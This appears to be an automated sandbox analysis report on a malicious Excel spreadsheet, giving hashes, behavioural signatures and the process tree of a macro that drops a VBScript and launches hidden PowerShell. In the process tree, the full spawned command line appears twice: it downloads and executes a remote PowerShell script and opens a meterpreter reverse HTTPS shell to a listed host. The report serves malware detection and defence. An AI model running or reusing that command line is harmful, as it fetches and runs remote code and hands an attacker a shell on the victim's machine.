Analysis
-
max time kernel
40s -
max time network
37s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10-07-2024 21:50
Behavioral task
behavioral1
Sample
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls
Resource
win10v2004-20240709-en
General
-
Target
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls
-
Size
44KB
-
MD5
3d2b24d0a1db0e82fa1f254924128354
-
SHA1
1cecd46eac6c6aadbb5fb6a1869337328400e745
-
SHA256
473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac
-
SHA512
3a8c459a1d67f69b7558832821cc78a3f4571597a9ce4969edc9aea4947ff791b1fe47206c0ef229c5e3f5d13f632c33358be3198ba260a5123c5fd72d644948
-
SSDEEP
768:Stvo+eUk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJET+juFlmQQcAOJ9acv9acyL:6/k3hbdlylKsgqopeJBWhZFGkE+cL2Ni
Malware Config
Extracted
https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3800 2424 powershell.exe 83 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 5032 4124 wscript.exe 82 -
Blocklisted process makes network request 2 IoCs
flow pid Process 11 3800 powershell.exe 12 1992 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3800 powershell.exe 1992 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 9 raw.githubusercontent.com 11 raw.githubusercontent.com 12 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4124 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3800 powershell.exe 3800 powershell.exe 1992 powershell.exe 1992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3800 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4124 EXCEL.EXE 4124 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE 4124 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4124 wrote to memory of 5032 4124 EXCEL.EXE 86 PID 4124 wrote to memory of 5032 4124 EXCEL.EXE 86 PID 5032 wrote to memory of 1992 5032 wscript.exe 87 PID 5032 wrote to memory of 1992 5032 wscript.exe 87
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\473f5d2bb2e7518268fdb7a9fb439b802ffc4f9aa76ac3fcdbbd60d58cc44dac.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Windows\SYSTEM32\wscript.exewscript C:\Users\Public\config.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3800
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize3KB
MD5e97a8090f3e1486f3c1184be030e33fd
SHA15c359d878bfc4a2d60b58c2a63b3f5f99aa0c45d
SHA256d3f64a2301ee66bc64aa01be9252ca3e4f6b8f2ffd58531f57e46b5ea19952e1
SHA51222a0ec7dbbd8f405038fe9bb5a682493663680acc2701c93eb25b670c113fc8d69856b780d7290ba75c476f76741df1088df0d48900e429a306ba09305e405ee
-
Filesize
461B
MD5ce52ab154163c511f0efa6a61e22ab64
SHA19f12cc215e15802eddcb02cb5370ef16b21fa3a6
SHA256df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17
SHA512cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78